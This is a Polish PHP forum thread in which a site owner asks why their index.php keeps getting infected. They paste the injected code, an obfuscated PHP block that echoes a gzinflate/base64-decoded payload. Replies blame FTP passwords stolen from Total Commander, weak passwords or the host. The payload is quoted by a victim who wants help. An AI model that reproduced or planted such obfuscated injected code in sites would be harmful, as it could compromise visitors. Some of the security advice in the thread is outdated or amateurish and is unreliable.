Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Jestem atakowany wirusem, ktoś atakuje mnie wirusem
qpeace1
post
Post #1





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 1.06.2008

Ostrzeżenie: (0%)
-----


Witam, mam spory problem z jedną stronką którą ktoś od kilku m-cy atakuje wirusami zmieniając pliki na serwerze dopisując kody, jeden z nich to:


  1. <?php
  2. #d93065#
  3. echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO
    6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIE
    VQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpg
    huJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6
    KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBq
    pNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxay
    vo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW
    8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B"
    )));
  4. #/d93065#
  5. ?>


wie ktoś o co chodzi i jak mogę się zabezpieczyć?


dodam, że zmienne w plikach zabezpieczyłem tak:

  1. $pobiez_sekcje = mysql_escape_string($_GET['id1']);
  2. //jak pobrana zmienna jest liczbą - zabezpieczenie przed zmodyfikowaniem linku o jakieś niedozwolone znaki
  3. if (is_numeric($pobiez_sekcje)) {
  4. $sekcja = $pobiez_sekcje;


nie wiem co jeszcze mogę zrobić


bardzo proszę o jakiekolwiek wskazówki
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 15)
tolomei
post
Post #2





Grupa: Zarejestrowani
Postów: 450
Pomógł: 135
Dołączył: 18.11.2010
Skąd: Wschowa

Ostrzeżenie: (0%)
-----


Witaj.

Coś podobnego było kiedyś na home.pl.
Była to wina hostera - złapali wirusa na wszystkich serwerach.
Może jakiś inny użytkownik pamięta takie zdarzenie.

Pozdrawiam.
Go to the top of the page
+Quote Post
qpeace1
post
Post #3





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 1.06.2008

Ostrzeżenie: (0%)
-----


dzięki za pomoc, czyli powinienem się skontaktować z właścicielem serwera, ale jedno mnie gnębi - na ich stronie jest wszystko OK (nie mają wirusa), czy to możliwe że atakuje tylko jeden katalog na serwerze?

dzięki i pozdrawiam
Go to the top of the page
+Quote Post
Substr
post
Post #4





Grupa: Zarejestrowani
Postów: 58
Pomógł: 8
Dołączył: 22.06.2009

Ostrzeżenie: (0%)
-----


Używasz może Total Commandera? Kiedyś był jakiś wirus wykradający z niego hasła i doklejający do plików na serwerze jakiś kod. Jeżeli używasz to radzę zmienić wersję na nową, nie zapamiętywać hasła w programie, oraz zmienić je na inne.
Go to the top of the page
+Quote Post
qpeace1
post
Post #5





Grupa: Zarejestrowani
Postów: 19
Pomógł: 0
Dołączył: 1.06.2008

Ostrzeżenie: (0%)
-----


używam TC, ale ja nie mam zainfekowanego komputera, poza tym jak nadpiszę plik index.php (bo on głównie jest atakowany) to jakiś czas mam spokój i po kilku dniach znowu plik index.php jest zarażony, przy czym ja w tym czasie nie korzystałem z TC.

Pamiętasz może jaki to był wirus, żebym się trochę o nim dowiedział?

Ten post edytował qpeace1 12.04.2012, 21:52:03
Go to the top of the page
+Quote Post
tolomei
post
Post #6





Grupa: Zarejestrowani
Postów: 450
Pomógł: 135
Dołączył: 18.11.2010
Skąd: Wschowa

Ostrzeżenie: (0%)
-----


Napisałem abyś poczekał na innych użytkowników którzy mogliby potwierdzić moją wersję.
Ja po prostu nie jestem pewien czy to wina hostera. Po prostu coś takiego pamiętam z przeszłości, ale możliwe, że gadam głupoty. Ja mogę się mylić.
Zanim napiszesz do obsługi hostingu - poczekaj aż wątek się rozwinie.
Go to the top of the page
+Quote Post
Substr
post
Post #7





Grupa: Zarejestrowani
Postów: 58
Pomógł: 8
Dołączył: 22.06.2009

Ostrzeżenie: (0%)
-----


Zapoznaj się z wynikami google: https://www.google.pl/search?q=total+commander+wirus
Nie musisz korzystać w tym czasie z TC, wystarczy że masz w nim zapamiętane hasło.

Ten post edytował Substr 12.04.2012, 22:22:41
Go to the top of the page
+Quote Post
maniana
post
Post #8





Grupa: Zarejestrowani
Postów: 207
Pomógł: 44
Dołączył: 18.05.2007

Ostrzeżenie: (0%)
-----


Piszę to jako osoba pracująca przy hostingu. W 99% przypadku jest to wina przechwyconego hasła. Podmiana plików nic nie daje za to zmiana dostępów zawsze przerywała ten proceder. Hasło najlepiej zapamiętać i wpisywać z palca albo przeklejać z innego miejsca.
Go to the top of the page
+Quote Post
thek
post
Post #9





Grupa: Moderatorzy
Postów: 4 362
Pomógł: 714
Dołączył: 12.02.2009
Skąd: Jak się położę tak leżę :D




Z tym, że to zawsze wina zapamiętywania hasła nie do końca sie mogę zgodzić. Używam Filezilli. Nie zapamiętuję haseł. Podobny syf wlazł na serwisy. Pliki wszystkich serwisów na local zdarte i wyczyszczone. Hasła nie były zapamiętywane. Po 2 dniach powtórka z rozrywki. Znowu zabawa... i po kolejnych 2 znów to samo (IMG:style_emoticons/default/wink.gif) Teraz na dzien dobry sprawdzam ten hosting jak tylko do pracy przychodzę. Zabawa trwa od około 2 tygodni. Nawet już do tego serwera konfiigurację połaczenia usunąłem (nie tylko nie zapamiętuję hasła, ale nie mam nawet adresu ip czy loginu - wszystko z palca wpisywane). Jeśli w ciągu weekendu coś się wbije - pisze do hostingu.
Go to the top of the page
+Quote Post
maniana
post
Post #10





Grupa: Zarejestrowani
Postów: 207
Pomógł: 44
Dołączył: 18.05.2007

Ostrzeżenie: (0%)
-----


Połączenie może zostać zapamiętane. Ja po zmianie dostępów FTP maiłem (i klient miał) już z tym spokój. Część tego typu syfu instaluje się też poprzez dziury w skryptach ale cześciej takie dziury wykorzystywane są do deface www.
Go to the top of the page
+Quote Post
Pilsener
post
Post #11





Grupa: Zarejestrowani
Postów: 1 590
Pomógł: 185
Dołączył: 19.04.2006
Skąd: Gdańsk

Ostrzeżenie: (0%)
-----


Najlepiej nie używać popularnych klientów ftp i nie zapamiętywać haseł. Ale to nie wszystko, bo nikt nie zabrania próby wbicia się przez ftp przy pomocy słownika lub bf - dlatego radzę też używać haseł innych niż "kotek" (IMG:style_emoticons/default/thumbsdownsmileyanim.gif)
Go to the top of the page
+Quote Post
!*!
post
Post #12





Grupa: Zarejestrowani
Postów: 4 298
Pomógł: 447
Dołączył: 16.11.2006

Ostrzeżenie: (0%)
-----


Zgaduję że te problemy macie korzystając z systemu windows? A czy TC lub innego klienta FTP nie można zmusić do korzystania z jakiegoś menadżera haseł? To by załatwiło sprawę.
Go to the top of the page
+Quote Post
prowseed
post
Post #13





Grupa: Zarejestrowani
Postów: 433
Pomógł: 64
Dołączył: 29.01.2011
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Korzystam z TC, slyszalem o problemie z haslami ale bardzo odpowiada mi ten program ( moze z racji tego, ze wychowalem sie na norton commanderze- zwykle przyzwyczajenie ), dlatego staram sie zawsze do hasla dopisywac na koncu jeden znak, podczas logowania oczywiscie mam odrzut, wybieram 'wprowadz powonie dane', usuwam ostatni znak i smiga. Haslo dalej jest zapamietane, ale w "niby" zakodowanej postaci : ) Taki prymitywny sposob, ale dziala.
Go to the top of the page
+Quote Post
viking
post
Post #14





Grupa: Zarejestrowani
Postów: 6 380
Pomógł: 1116
Dołączył: 30.08.2006

Ostrzeżenie: (0%)
-----


Teraz znacznie bardziej popularne jest WinSCP. A wygląd i działanie jak w TC. Nie słyszałem też żeby ktoś hasła w nim stracił.
Go to the top of the page
+Quote Post
Niktoś
post
Post #15





Grupa: Zarejestrowani
Postów: 1 195
Pomógł: 109
Dołączył: 3.11.2011

Ostrzeżenie: (10%)
X----


A co myślicie o PUTTY?
Go to the top of the page
+Quote Post
thek
post
Post #16





Grupa: Moderatorzy
Postów: 4 362
Pomógł: 714
Dołączył: 12.02.2009
Skąd: Jak się położę tak leżę :D




Używam, ale jedynie przy łączeniu z SSH (IMG:style_emoticons/default/smile.gif)
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 22.08.2025 - 12:45